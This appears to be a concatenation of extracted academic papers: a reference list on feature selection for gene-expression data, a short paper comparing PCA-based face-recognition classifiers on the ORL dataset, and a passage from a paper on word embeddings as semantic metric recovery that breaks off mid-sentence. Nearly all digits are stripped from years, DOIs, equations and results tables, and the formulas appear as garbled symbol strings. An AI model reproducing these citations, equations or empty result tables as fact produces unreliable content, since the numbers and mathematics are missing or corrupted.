#supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /peerj-cs. tibshirani r, sherlock g, chan wc, greiner tc, weisenburger dd, armitage jo, warnke r, levy r, wilson w, grever mr, byrd jc, botstein d, brown p, staudt lm. . distinct types of diffuse large b-cell lymphoma identified by gene expression profiling. nature ( ): – doi . / . bhattacharjee a, richards wg, staunton j, li c, monti s, vasa p, ladd c, beheshti j, bueno r, gillette m, loda m, weber g, mark ej, lander es, wong w, johnson be, golub tr, sugarbaker dj, meyerson m. . classification of human lung carcinomas by mrna expression profiling reveals distinct adenocarcinoma subclasses. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . boyd s, parikh n, chu e, peleato b, eckstein j. . distributed optimization and statistical learning via the alternating direction method of multipliers. foundations and trends in machine learning ( ): – doi . / . calcagno g, staiano a, fortunato g, brescia-morra v, salvatore e, liguori r, capone s, filla a, longo g, sacchetti l. . a multilayer perceptron neural network-based approach for the identification of responsiveness to interferon therapy in multiple sclerosis patients. information sciences ( ): – doi . /j.ins. . . . camastra f, di taranto m, staiano a. . statistical and computational methods for genetic diseases: an overview. computational and mathematical methods in medicine : . chawla nv, bowyer kw, hall lo, kegelmeyer wp. . smote: synthetic minority over-sampling technique. journal of artificial intelligence research : – doi . /jair. . ciaramella a, cocozza s, iorio f, miele g, napolitano f, pinelli m, raiconi g, tagli- aferri r. . interactive data analysis and clustering of genomic data. neural networks ( – ): – doi . /j.neunet. . . . ciaramella a, gianfico m, giunta g. . compressive sampling and adaptive dictio- nary learning for the packet loss recovery in audio multimedia streaming. multime- dia tools and applications ( ): – doi . /s - - -x. ciaramella a, giunta g. . packet loss recovery in audio multimedia streaming by using compressive sensing. iet communications ( ): – doi . /iet-com. . . demetriou ca, chen j, polidoro s, van veldhoven k, cuenin c, campanella g, brennan k, clavel-chapelon f, dossus l, kvaskoff m, drogan d, boeing h, kaaks r, risch a, trichopoulos d, lagiou p, masala g, sieri s, tumino r, panico s, quirós jr, sánchez perez mj, amiano p, huerta castaño jm, ardanaz e, onland-moret c, peeters p, khaw kt, wareham n, key tj, travis rc, romieu i, gallo v, gunter m, herceg z, kyriacou k, riboli e, flanagan jm, vineis p. . methylome analysis and epigenetic changes associated with menarcheal age. plos one ( ):e doi . /journal.pone. . demšar j. . statistical comparisons of classifiers over multiple data sets. journal of machine learning research (jan): – . nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /pnas. http://dx.doi.org/ . / http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /jair. http://dx.doi.org/ . /j.neunet. . . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /iet-com. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. deng w, lai m-j, peng z, yin w. . parallel multi-block admm with o ( /k) conver- gence. journal of scientific computing ( ): – doi . /s - - - . di taranto md, staiano a, d’agostino mn, d’angelo a, bloise e, morgante a, marotta g, gentile m, rubba p, fortunato g. . association of usf and apoa polymorphisms with familial combined hyperlipidemia in an italian pop- ulation. molecular and cellular probes ( ): – doi . /j.mcp. . . . draghici s, khatri p, eklund a, szallasi z. . reliability and reproducibility issues in dna microarray measurements. trends in genetics ( ): – doi . /j.tig. . . . dunn oj. . multiple comparisons among means. journal of the american statistical association ( ): – doi . / . . . elhamifar e, sapiro g, vidal r. . see all by looking at a few: sparse modeling for finding representative objects. in: ieee conference on computer vision and pattern recognition. piscataway: ieee, – . engan k, aase so, husoy jh. . method of optimal directions for frame design. in: ieee international conference on acoustics, speech, and signal processing. piscataway: ieee, – . friedman j, hastie t, tibshirani r. . the elements of statistical learning. vol. . new-york: springer. friedman m. . the use of ranks to avoid the assumption of normality implicit in the analysis of variance. journal of the american statistical association ( ): – doi . / . . . fu x, wang l. . a ga-based rbf classifier with class-dependent features. in: evolutionary computation, . cec’ . proceedings of the congress on, vol. . ieee, – . golub tr, slonim dk, tamayo p, huard c, gaasenbeek m, mesirov jp, coller h, loh ml, downing jr, caligiuri ma, bloomfield cd, lander es. . molecular classification of cancer: class discovery and class prediction by gene expression monitoring. science ( ): – doi . /science. . . . gu q, li z, han j. . generalized fisher score for feature selection. arxiv preprint. arxiv: . a . guyon i, elisseeff a. . an introduction to variable and feature selection. journal of machine learning research : – . haslinger c, schweifer n, stilgenbauer s, döhner h, lichter p, kraut n, stratowa c, abseher r. . microarray gene expression profiling of b-cell chronic lymphocytic leukemia subgroups defined by genomic aberrations and vh mutation status. journal of clinical oncology ( ): – doi . /jco. . . . he x, cai d, niyogi p. . laplacian score for feature selection, advances in nerual information processing systems. cambridge: mit press. hoque n, bhattacharyya dk, kalita jk. . mifs-nd: a mutual information-based feature selection method. expert systems with applications ( ): – doi . /j.eswa. . . . nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.mcp. . . http://dx.doi.org/ . /j.tig. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /science. . . http://arxiv.org/abs/ . a http://dx.doi.org/ . /jco. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. jolliffe it. . principal component analysis and factor analysis. in: principal compo- nent analysis. new york: springer, – . jović a, brkić k, bogunović n. . a review of feature selection methods with appli- cations. in: th international convention on information and communication technology, electronics and microelectronics (mipro). ieee, – . kira k, rendell la. . a practical approach to feature selection. in: proceedings of the ninth international workshop on machine learning. – . kononenko i. . estimating attributes: analysis and extensions of relief. in: european conference on machine learning. berlin, heidelberg: springer, – . kraskov a, stögbauer h, grassberger p. . estimating mutual information. physical review e ( ): – doi . /physreve. . . kreyszig e. . advanced engineering mathematics. chichester: john wiley & sons. mairal j, bach f, ponce j, sapiro g, zisserman a. . discriminative learned dictio- naries for local image analysis. in: ieee conference on computer vision and pattern recognition, . cvpr . piscataway: ieee, – . mairal j, bach f, ponce j, sapiro g, zisserman a. . non-local sparse models for image restoration. in: ieee th international conference on computer vision and pattern recognition. piscataway: ieee, – . nardone d, ciaramella a, staiano a. a. biological datasets. available at https: //zenodo.org/record/ #.xxkatugzauk. nardone d, ciaramella a, staiano a. b. source code. available at https://github. com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature- selection. nie f, huang h, cai x, ding ch. . efficient and robust feature selection via joint ` , -norms minimization. in: advances in neural information processing systems. vancouver, british columbia, canada, – . nutt cl, mani d, betensky ra, tamayo p, cairncross jg, ladd c, pohl u, hartmann c, mclaughlin me, batchelor tt, black pm, von deimling a, pomeroy sl, golub sl, louis dn. . gene expression-based classification of malignant gliomas correlates better with survival than histological classification. cancer research ( ): – . peng h, long f, ding c. . feature selection based on mutual information criteria of max-dependency, max-relevance, and min-redundancy. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . pineda-bautista bb, carrasco-ochoa ja, martınez-trinidad jf. . general framework for class-specific feature selection. expert systems with applications ( ): – doi . /j.eswa. . . . ramaswamy s, tamayo p, rifkin r, mukherjee s, yeang c-h, angelo m, ladd c, reich m, latulippe e, mesirov jp, poggio t, gerald wl, loda mf, lander es, golub tr. . multiclass cancer diagnosis using tumor gene expression signatures. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /physreve. . https://zenodo.org/record/ #.xxkatugzauk https://zenodo.org/record/ #.xxkatugzauk https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection https://github.com/davidenardone/a-sparse-coding-based-approach-for-class-specific-feature-selection http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. ramirez i, sprechmann p, sapiro g. . classification and clustering via dictionary learning with structured incoherence and shared features. in: ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee, – . rodríguez-fdez i, canosa a, mucientes m, bugarín a. . stac: a web platform for the comparison of algorithms using statistical tests. in: fuzzy systems (fuzz-ieee), ieee international conference on. piscataway: ieee, – . ross bc. . mutual information between discrete and continuous data sets. plos one ( ):e doi . /journal.pone. . saeys y, inza i, larrañaga p. . a review of feature selection techniques in bioinfor- matics. bioinformatics ( ): – doi . /bioinformatics/btm . sokolova m, lapalme g. . a systematic analysis of performance measures for classification tasks. information processing & management ( ): – doi . /j.ipm. . . . staiano a, de vinco l, ciaramella a, raiconi g, tagliaferri r, amato r, longo g, donalek c, miele g, di bernardo d. . probabilistic principal surfaces for yeast gene microarray data mining. in: proceedings of the fourth ieee international conference on data mining, icdm . piscataway: ieee, – . staiano a, di taranto md, bloise e, d’agostino mn, d’angelo a, marotta g, gentile m, jossa f, iannuzzi a, rubba p, fortunato g. . investigation of single nucleotide polymorphisms associated to familial combined hyperlipidemia with random forests. in: neural nets and surroundings. vol. ( ). berlin, heidelberg: springer, – . su ai, welsh jb, sapinoso lm, kern sg, dimitrov p, lapp h, schultz pg, powell sm, moskaluk ca, frierson h, hampton gm. . molecular classification of human carcinomas by use of gene expression signatures. cancer research ( ): – . tang j, alelyani s, liu h. . feature selection for classification: a review. in: data classification: algorithms and applications. boca raton: crc press, – doi . /b . tibshirani r. . regression shrinkage and selection via the lasso. journal of the royal statistical society, series b : – . wolpert dh, macready wg. . no free lunch theorems for optimization. ieee transactions on evolutionary computation ( ): – doi . / . . xiong m, fang x, zhao j. . biomarker identification by feature wrappers. genome research ( ): – doi . /gr. . yang k, cai z, li j, lin g. . a stable gene selection in microarray data analysis. bmc bioinformatics ( ): doi . / - - - . zou h, hastie t. . regularization and variable selection via the elastic net. journal of the royal statistical society: series b (statistical methodology) ( ): – doi . /j. - . . .x. nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /j.ipm. . . http://dx.doi.org/ . /b http://dx.doi.org/ . / . http://dx.doi.org/ . /gr. http://dx.doi.org/ . / - - - http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - a comparative study of face recognition classification algorithms wang changyuan school of computer science and engineering xi’an technological university xi’an, china e-mail: cyw @ .com li guang northwest institutes of advanced technology xi’an technological university xi’an, china e-mail: @qq.com xue pengxiang school of computer science and engineering xi’an technological university xi’an, china e-mail: xuepx@xatu.edu.cn wu qiyou school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com abstract— due to the different classification effects and accuracy of different classification algorithms in machine learning, it is inconvenient for scientific researchers to choose which classification algorithm to use. this paper uses the face data published by cambridge university as an experiment. the experiment first reduces the dimensionality of the data through the principal component analysis (pca) algorithm, extracts the main features of the data, and then respectively through linear logic classification, linear discrimination lda, nearest neighbor algorithm knn, support vector machine svm and the integrated algorithm adaboost are used for classification. by comparing the advantages and disadvantages of the classification performance and complexity of different algorithms, the final review reviews accuracy, recall, f -score, and auc as evaluation indicators. keywords-classification algorithm; machine learning; face recognition; model evaluation i. introduction with the rise of artificial intelligence and machine learning, face recognition technology is widely used in life, such as station security, time and attendance punching, and secure payment [ - ], but different face recognition devices use different algorithms. therefore, this paper analyzes and compares the commonly used classification algorithms in face recognition. the data set in this paper uses the orl face data set published by cambridge university in the united kingdom. the methods used involve linear logistic regression, linear discriminant analysis (lda), k-nearest neighbor (knn), support vector machine (svm), naïve bayes (nb) and other methods. the definition and advantages and disadvantages of the act are briefly explained. finally, the five methods are compared and analyzed according to the evaluation indicators such as the accuracy rate, recall rate, f -score, and auc area commonly used in machine learning. international journal of advanced network, monitoring and controls volume , no. , ii. related work a. principal component analysis pca data dimensionality reduction the data set contains a total of photos. we use the machine learning library scikit-learn provided by python to process the data, and display part of the data set pictures as shown in figure . figure . orl partial face image the experimental data has features per picture. since the number of features is much greater than the number of samples, it is easy to regenerate overfitting during training. therefore, a principal component analysis algorithm is required to reduce the dimensions of the features and select k main features as the input of the data set. . the main idea of pca [ ] uses the covariance matrix to calculate the degree of dispersion of samples in different directions, and selects the direction with the largest variance as the main direction of the sample set. processing process: a) data preprocessing normalizes and scales the data first. normalization makes the mean value of data features , and scaling is to solve the case where feature values are different by an order of magnitude. b) calculate the covariance matrix and eigenvectors of the processed data. the eigenvectors can be obtained by singular value decomposition. c) retain the feature vector and feature value corresponding to the largest first k feature values to form an orthogonal basis. d) project the sample into a low-dimensional space, and the acquired dimensionality-reduced data can represent the original sample approximately, but with a certain degree of distortion. this paper use formula ( ) to calculate the distortion of pca.      m i m i i approx i x m xx m x )( )()( ( ) through scikit-learn processing, the reduction rate after dimensionality reduction is obtained from the pca model diagram is shown in figure . it can be seen from the figure that the larger the value of k, the smaller the distortion rate. as k continues to increase, the data reduction rate will approach using this rule, choose between and , and perform sampling calculation every th. under the k features of all samples, the reduction rate is obtained after processing by the pca algorithm. we select the reduction ratios at %, %, %, and %, and the corresponding k values are , , , and . the corresponding pictures after pca processing are displayed. the first line of the image is the original image, and then each column corresponds to the it is a picture at different reduction rates. the lower the reduction rate, the more blurred the image is shown in figure . figure . relationship between reduction rate and k characteristics international journal of advanced network, monitoring and controls volume , no. , figure . relationship between reduction rate and k characteristics b. research on classification method ) logistic regression supervised learning is the most widely used branch of machine learning in industry. classification and regression are the main methods in supervised learning. linear classifier is the most basic and commonly used machine learning model. this paper uses linear logistic regression to classify and recognize faces. the prediction function of linear regression is:   x x x x x t n n                         . . . ......,)(h ( ) where is the prediction function, x is the feature vector, to handle the classification problem, this paper hope that the value of the function is [ , ], this paper introduce the sigmoid function: z e z    )(g ( ) combined with linear regression prediction function: x t t e xz       )(g)(g(x)h ( ) if there is a simple binary classification of class a or class b, then this paper can use sigmoid as the probability density function of the sample, and the result of the input classification can be expressed by probability: ),| (),| (   xypxyp ( ) the cost function is a function that describes the difference between the predicted value and the true value of the model. if there are multiple data samples, the average value of the replacement price function is obtained. it is expressed by j(θ). close to, based on the maximum likelihood estimate available cost function j (θ).     m i iiii xhyxhy m j )()()()( ))( log() ()(log(( )(   ( ) ) linear discriminant analysis (lda) linear discriminant analysis (lda) [ , ] , also known as fisher linear discriminant (fld), was introduced into the field of machine learning by belhumeur. lda is a dimensionality reduction technique in supervised learning, which can not only reduce dimensionality but also classify, and mainly project data features from high latitude to low latitude space. the core idea is that after projection, the projection points of the same category of data should be as close as possible, and the distance between the category centers of different categories of data should be increased as much as possible [ ]. if the data set has two data sets, for the center of the two classes then within-class scatter matrix (within-class scatter matrix): international journal of advanced network, monitoring and controls volume , no. , t xx t xx uxuxuxux s )()()()( w      ( ) between-class scatter matrix: t b uus ) u)( u(  ( ) ) knn among n training samples, find the k nearest neighbors of the test sample x. suppose there are m training samples in the data set, and there are c categories, namely   c  ,... , and the test sample is x. then the knn algorithm can be described as: find k neighbors of x in m training samples, among which the number of samples belonging to category wi in k neighbors of x are kckk ,..., , then the discriminant function is cikxg ii ,... , ,)(  ( ) the core idea of k-nearest neighbor algorithm [ ] is to calculate the distance between unlabeled data samples and each sample in the data set, take the k nearest samples, and then k neighbors vote to decide the type of unlabeled samples. knn classification steps: a) prepare the training sample set x, which contains n training samples, and select an appropriate distance measurement method according to specific requirements. this paper use dis(xa,xb) to represent the distance between ax and bx in the sample set. b) for the test sample x, use the distance measurement formula to calculate the distance between the test sample x and n samples to obtain the distance set dis, where  ),(),...,,(),,(is n xxdisxxdisxxdisd  . c) sort the distance set, select the smallest k elements from it, and get k samples corresponding to k elements. d) count the categories of these k samples, and obtain the final classification results by voting. assuming that x_test is an unlabeled sample and x_train is a labeled sample, the algorithm is as follows: figure . k nearest neighbor algorithm for distance measurement, euclidean distance, manhattan distance, chebyshev distance, etc. are usually used. generally, euclidean distance is mostly used, such as the distance between two points and two points in n-dimensional euclidean space. )(d a b    n i ii xx ( ) ) svm support vector machine (svm)[ ] for short is a very important and extensive machine learning algorithm. its starting point is to find the optimal decision boundary as far as possible, which is the farthest from the two types of data points. furthermore, is the farthest from the boundary of the two types of data points, so the data point closest to the boundary is defined as a support vector. finally, our goal becomes to find such a straight line (multi-dimensional called hyperplane), which has the largest distance from the support vector. make the generalization ability of the model as good as possible, so svm prediction of future data is also more accurate, as shown in figure below. find the best dahua margin. international journal of advanced network, monitoring and controls volume , no. , figure . classification model diagram let this plane be represented by g(x)= , its normal vector is represented by w, the actual distance between a point and the plane is r point, and the distance from the plane can be measured by the absolute value of g(x) (called the function interval) . li bxwy ww i t i t bw .... , )( min ,   ( ) the penalty function is also called the penalty function, which is a kind of restriction function. for constrained nonlinear programming, its constraint function is called a penalty function, and the coefficient is called a penalty factor. the objective function of svm (soft interval support vector machine) with penalty factor c is: figure . introduction of c classification model diagram    l t bw cww i , min  , ( ) advantages of svm: a) non-linear mapping is the theoretical basis of svm method, svm uses inner product kernel function to replace the nonlinear mapping to high-dimensional space; b) the optimal hyperplane to divide the feature space is the goal of svm, and the idea of maximizing the classification margin is the core of the svm method; c) support vector is the training result of svm. it is the support vector that plays a decisive role in svm classification decision. d) svm is a novel small sample learning method with a solid theoretical foundation. it basically does not involve probability measurement and the law of large numbers, so it is different from the existing statistical methods. in essence, it avoids the traditional process from induction to deduction, realizes efficient "transduction inference" from training samples to forecast samples, and greatly simplifies the usual classification and regression problems. ) naive bayes naive bayes [ , ] is a conditional independence assumption, and there is no correlation between leave and leave. suppose there is a labeled data set, where the data set has a total of categories, and for new samples, this paper predict the value. this paper use statistical methods to deal with this problem, so this paper can understand it as the probability of the category to which the sample belongs. the conditional probability formula is: )|( xcp k ( ) therefor ck ∈ [c , c … , cm] , this paper only require the probabilities of m categories, the category international journal of advanced network, monitoring and controls volume , no. , belongs to the largest value, and use bayes' theorem to solve: )( )|()( )|( xp cxpcp xcp kk k  ( ) and because x has n feature vectors, it is in the determined data set , ck , p(x) are fixed values, according to the joint probability formula: p(ck)p(x|ck) = p(ck, x) ( ) iii. experimental results the data set in this paper uses the orl face data set of cambridge university, a total of photos. after experimental analysis, this paper chose pca to reduce the information rate after dimensionality reduction to %, and select as the main features of each picture as data input. in order to make the experimental results more generalized, % of the data set is used as the training set and % is used as the test set. the -fold cross-validation method is used during model training. in order to ensure that the experimental results run the same data every time, a fixed random seed is set is . for the test standard, this paper selected the accuracy rate (p), recall rate (r), f value, and auc area. compared with our prediction results, the accuracy rate indicates how many true positive samples are in the positive prediction samples. there are two possibilities for the prediction results, that is, the positive prediction is positive (tp), and the negative prediction is positive (fp), the formula is: fptp tp p   ( ) the recall rate refers to our original sample, indicating how many positive examples in the sample were predicted correctly. there are also two possibilities, that is, the original positive class is predicted as a positive class (tp), and the other is to predict the original positive class as a negative class (fn). fntp tp r   ( ) f combines the results of precision rate and recall rate. when f is higher, it means that the verification method is more effective. rp pr f   ( ) table i. the comparison of experimental results of five classification algorithms pca+lr pca+lda pca+svm pca+knn pca+nb precision (%) recall (%) fl-score (%) iv. conclusion face recognition technology [ ] has become one of the most popular research directions in computer vision and has made great achievements. with the development of computer technology, more and more classification methods will appear. this thesis is only through several common mainstream classification methods for experimental analysis and comparison. through experiments, it is found that the pca + linear logic classification method has obvious advantages in accuracy rate and recall rate. however, specific analysis should be combined with specific issues. then i am ready to do experiments on different data sets, understand more classification algorithms, and constantly improve my results. international journal of advanced network, monitoring and controls volume , no. , references [ ] wu xiaotian. research on face recognition algorithm in subway security inspection [d]. dalian jiaotong university, . [ ] chen fuqiang. research on invalid face filtering method in video attendance [d]. southwest jiaotong university, . [ ] ma yukun. research on key technologies of face-based secure identity authentication [d]. beijing university of technology, . [ ] pattern analysis; new pattern analysis findings from king saud university discussed (pcapool: unsupervised feature learning for face recognition using pca, lbp, and pyramid pooling) [j]. journal of robotics & machine learning, . [ ] zhang yuting, chen junhua, yang xinkai, zhang liyan. an improved pca+lda face recognition algorithm [j]. computer knowledge and technology, , ( ): - . [ ] guan‐hua huang, chih‐hsuan lin, yu‐ren cai, tai‐been chen, shih‐yen hsu, nan‐han lu, huei‐yung chen, yi‐chen wu. multiclass machine learning classification of functional brain images for parkinson's disease stage prediction [j]. statistical analysis and data mining: the asa data science journal, , ( ). [ ] ou lisong. design and improvement of face recognition system based on svm [j]. network security technology and application, ( ): - . [ ]liu jie, song bo. naive bayesian classifier based on genetic simulated annealing algorithm [j]. procedia engineering, , . [ ] tie fuzhen. application of face recognition system in hotel industry [j]. computer products and circulation, ( ): + . [ ] jiang ajuan, zhang wenjuan. a summary of face recognition [j]. computer knowledge and technology, , ( ): - + . [ ] youqiang zhang, guo cao, bisheng wang, xuesong li. a novel ensemble method for k -nearest neighbor [j]. pattern recognition, , . word embeddings as metric recovery in semantic spaces tatsunori b. hashimoto, david alvarez-melis and tommi s. jaakkola csail, massachusetts institute of technology {thashim, davidam, tommi}@csail.mit.edu abstract continuous word representations have been remarkably useful across nlp tasks but re- main poorly understood. we ground word embeddings in semantic spaces studied in the cognitive-psychometric literature, taking these spaces as the primary objects to recover. to this end, we relate log co-occurrences of words in large corpora to semantic similarity assessments and show that co-occurrences are indeed consistent with an euclidean semantic space hypothesis. framing word embedding as metric recovery of a semantic space uni- fies existing word embedding algorithms, ties them to manifold learning, and demonstrates that existing algorithms are consistent metric recovery methods given co-occurrence counts from random walks. furthermore, we propose a simple, principled, direct metric recovery al- gorithm that performs on par with the state-of- the-art word embedding and manifold learning methods. finally, we complement recent fo- cus on analogies by constructing two new in- ductive reasoning datasets—series completion and classification—and demonstrate that word embeddings can be used to solve them as well. introduction continuous space models of words, objects, and sig- nals have become ubiquitous tools for learning rich representations of data, from natural language pro- cessing to computer vision. specifically, there has been particular interest in word embeddings, largely due to their intriguing semantic properties (mikolov et al., b) and their success as features for down- stream natural language processing tasks, such as named entity recognition (turian et al., ) and parsing (socher et al., ). the empirical success of word embeddings has prompted a parallel body of work that seeks to better understand their properties, associated estimation al- gorithms, and explore possible revisions. recently, levy and goldberg ( a) showed that linear lin- guistic regularities first observed with word vec extend to other embedding methods. in particu- lar, explicit representations of words in terms of co- occurrence counts can be used to solve analogies in the same way. in terms of algorithms, levy and goldberg ( b) demonstrated that the global min- imum of the skip-gram method with negative sam- pling of mikolov et al. ( b) implicitly factorizes a shifted version of the pointwise mutual informa- tion (pmi) matrix of word-context pairs. arora et al. ( ) explored links between random walks and word embeddings, relating them to contextual (prob- ability ratio) analogies, under specific (isotropic) as- sumptions about word vectors. in this work, we take semantic spaces stud- ied in the cognitive-psychometric literature as the prototypical objects that word embedding algo- rithms estimate. semantic spaces are vector spaces over concepts where euclidean distances between points are assumed to indicate semantic similar- ities. we link such semantic spaces to word co-occurrences through semantic similarity assess- ments, and demonstrate that the observed co- occurrence counts indeed possess statistical proper- ties that are consistent with an underlying euclidean space where distances are linked to semantic simi- larity. transactions of the association for computational linguistics, vol. , pp. – , . action editor: scott yih. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. analogy a b c i d d d d series completion a b i d d d d classification a b c i d d d d analogy a b c i d d d d series completion a b i d d d d classification a b c i d d d d analogy a b c i d d d d series completion a b i d d d d classification a b c i d d d d figure : inductive reasoning in semantic space proposed in sternberg and gardner ( ). a, b, c are given, i is the ideal point and d are the choices. the correct answer is shaded green. formally, we view word embedding methods as performing metric recovery. this perspective is sig- nificantly different from current approaches. instead of aiming for representations that exhibit specific se- mantic properties or that perform well at a particu- lar task, we seek methods that recover the underly- ing metric of the hypothesized semantic space. the clearer foundation afforded by this perspective en- ables us to analyze word embedding algorithms in a principled task-independent fashion. in particu- lar, we ask whether word embedding algorithms are able to recover the metric under specific scenarios. to this end, we unify existing word embedding al- gorithms as statistically consistent metric recovery methods under the theoretical assumption that co- occurrences arise from (metric) random walks over semantic spaces. the new setting also suggests a simple and direct recovery algorithm which we eval- uate and compare against other embedding methods. the main contributions of this work can be sum- marized as follows: • we ground word embeddings in semantic spaces via log co-occurrence counts. we show that pmi (pointwise mutual information) re- lates linearly to human similarity assessments, and that nearest-neighbor statistics (centrality and reciprocity) are consistent with an eu- clidean space hypothesis (sections and ). • in contrast to prior work (arora et al., ), we take metric recovery as the key object of study, unifying existing algorithms as consis- tent metric recovery methods based on co- occurrence counts from simple markov random walks over graphs and manifolds. this strong link to manifold estimation opens a promis- ing direction for extensions of word embedding methods (sections and and ). • we propose and evaluate a new principled di- rect metric recovery algorithm that performs comparably to the existing state of the art on both word embedding and manifold learning tasks, and show that glove (pennington et al., ) is closely related to the second-order taylor expansion of our objective. • we construct and make available two new in- ductive reasoning datasets —series completion and classification—to extend the evaluation of word representations beyond analogies, and demonstrate that these tasks can be solved with vector operations on word embeddings as well (examples in table ). word vectors and semantic spaces most current word embedding algorithms build on the distributional hypothesis (harris, ) where similar contexts imply similar meanings so as to tie co-occurrences of words to their underlying mean- ings. the relationship between semantics and co- occurrences has also been studied in psychomet- rics and cognitive science (rumelhart and abraham- son, ; sternberg and gardner, ), often by means of free word association tasks and seman- tic spaces. the semantic spaces, in particular, pro- vide a natural conceptual framework for continu- ous representations of words as vector spaces where semantically related words are close to each other. for example, the observation that word embeddings can solve analogies was already shown by rumel- hart and abrahamson ( ) using vector represen- tations of words derived from surveys of pairwise word similarity judgments. a fundamental question regarding vector space models of words is whether an euclidean vector http://web.mit.edu/thashim/www/supplement materials.zip task prompt answer analogy king:man::queen:? woman series penny:nickel:dime:? quarter classification horse:zebra:{deer, dog, fish} deer table : examples of the three inductive reasoning tasks proposed by sternberg and gardner ( ). space is a valid representation of semantic concepts. there is substantial empirical evidence in favor of this hypothesis. for example, rumelhart and abra- hamson ( ) showed experimentally that analog- ical problem solving with fictitious words and hu- man mistake rates were consistent with an euclidean space. sternberg and gardner ( ) provided fur- ther evidence supporting this hypothesis, proposing that general inductive reasoning was based upon op- erations in metric embeddings. using the analogy, series completion and classification tasks shown in table as testbeds, they proposed that subjects solve these problems by finding the word closest (in se- mantic space) to an ideal point: the vertex of a par- allelogram for analogies, a displacement from the last word in series completion, and the centroid in the case of classification (figure ). we use semantic spaces as the prototypical struc- tures that word embedding methods attempt to un- cover, and we investigate the suitability of word co- occurrence counts for doing so. in the next section, we show that co-occurrences from large corpora in- deed relate to semantic similarity assessments, and that the resulting metric is consistent with an eu- clidean semantic space hypothesis. the semantic space of log co-occurrences most word embedding algorithms are based on word co-occurrence counts. in order for such meth- ods to uncover an underlying euclidean semantic space, we must demonstrate that co-occurrences themselves are indeed consistent with some seman- tic space. we must relate co-occurrences to semantic similarity assessments, on one hand, and show that they can be embedded into a euclidean metric space, on the other. we provide here empirical evidence for both of these premises. we commence by demonstrating in figure that the pointwise mutual information (church and hanks, ) evaluated from co-occurrence figure : normalized log co-occurrence (pmi) linearly correlates with human semantic similarity judgments (men survey). counts has a strong linear relationship with seman- tic similarity judgments from survey data (pearson’s r= . ). however, this suggestive linear relation- ship does not by itself demonstrate that log co- occurrences (with normalization) can be used to de- fine an euclidean metric space. earlier psychometric studies have asked whether human semantic similarity evaluations are consis- tent with an euclidean space. for example, tver- sky and hutchinson ( ) investigate whether con- cept representations are consistent with the geomet- ric sampling (gs) model: a generative model in which points are drawn independently from a con- tinuous distribution in an euclidean space. they use two nearest neighbor statistics to test agreement with this model, and conclude that certain hierarchi- cal vocabularies are not consistent with an euclidean embedding. similar results are observed by griffiths et al. ( ). we extend this embeddability analy- sis to lexical co-occurrences and show that semantic similarity estimates derived from these are mostly consistent with an euclidean space hypothesis. the first test statistic for the gs model, the cen- trality c, is defined as c = n n∑ i= ( n∑ j= nij ) where nij = iff i is j’s nearest neighbor. under the gs model (i.e. when the words are consistent with a euclidean space representation), c ≤ with high probability as the number of words n →∞ re- gardless of the dimension or the underlying density (tversky and hutchinson, ). for metrically em- beddable data, typical non-asymptotic values of c normalizing the log co-occurrence with the unigram fre- quency taken to the / th power maximizes the linear correla- tion in figure , explaining this choice of normalization in prior work (levy and goldberg, a; mikolov et al., b). corpus c rf free association . . wikipedia corpus . . word vec corpus . . glove corpus . . table : semantic similarity data derived from mul- tiple sources show evidence of embeddability range between and , while non-embeddable hier- archical structures have c > . the second statistic, the reciprocity fraction rf (schwarz and tversky, ; tversky and hutchin- son, ), is defined as rf = n n∑ i= n∑ j= nijnji and measures the fraction of words that are their nearest neighbor’s nearest neighbor. under the gs model, this fraction should be greater than . . table shows the two statistics computed on three popular large corpora and a free word associ- ation dataset (see section for details). the near- est neighbor calculations are based on pmi. the results show a surprisingly high agreement on all three statistics for all corpora, with c and rf con- tained in small intervals: c ∈ [ . , . ] and rf ∈ [ . , . ]. these results are consistent with euclidean semantic spaces and the gs model in particular. the largest violators of c and rf are consistent with tversky’s analysis: the word with the largest centrality in the non-stopword wikipedia corpus is ‘the’, whose inclusion would increase c to . compared to . without it. tversky’s original analysis of semantic similarities argued that certain words, such as superordinate and function words, could not be embedded. despite such specific ex- ceptions, we find that for an appropriately normal- ized corpus, the majority of words are consistent with the gs model, and therefore can be represented meaningfully as vectors in euclidean space. the results of this section are an important step towards justifying the use of word co-occurrence counts as the central object of interest for seman- tic vector representations of words. we have shown both r and c are asymptotically dimension independent because they rely only on the single nearest neighbor. esti- mating the latent dimensionality requires other measures and assumptions (kleindessner and von luxburg, ). that they are empirically related to a human notion of semantic similarity and that they are metrically em- beddable, a desirable condition if we expect word vectors derived from them to truly behave as ele- ments of a metric space. this, however, does not yet fully justify their use to derive semantic repre- sentations. the missing piece is to formalize the connection between these co-occurrence counts and some intrinsic notion of semantics, such as the se- mantic spaces described in section . in the next two sections, we establish this connection by fram- ing word embedding algorithms that operate on co- occurrences as metric recovery methods. semantic spaces and manifolds we take a broader, unified view on metric 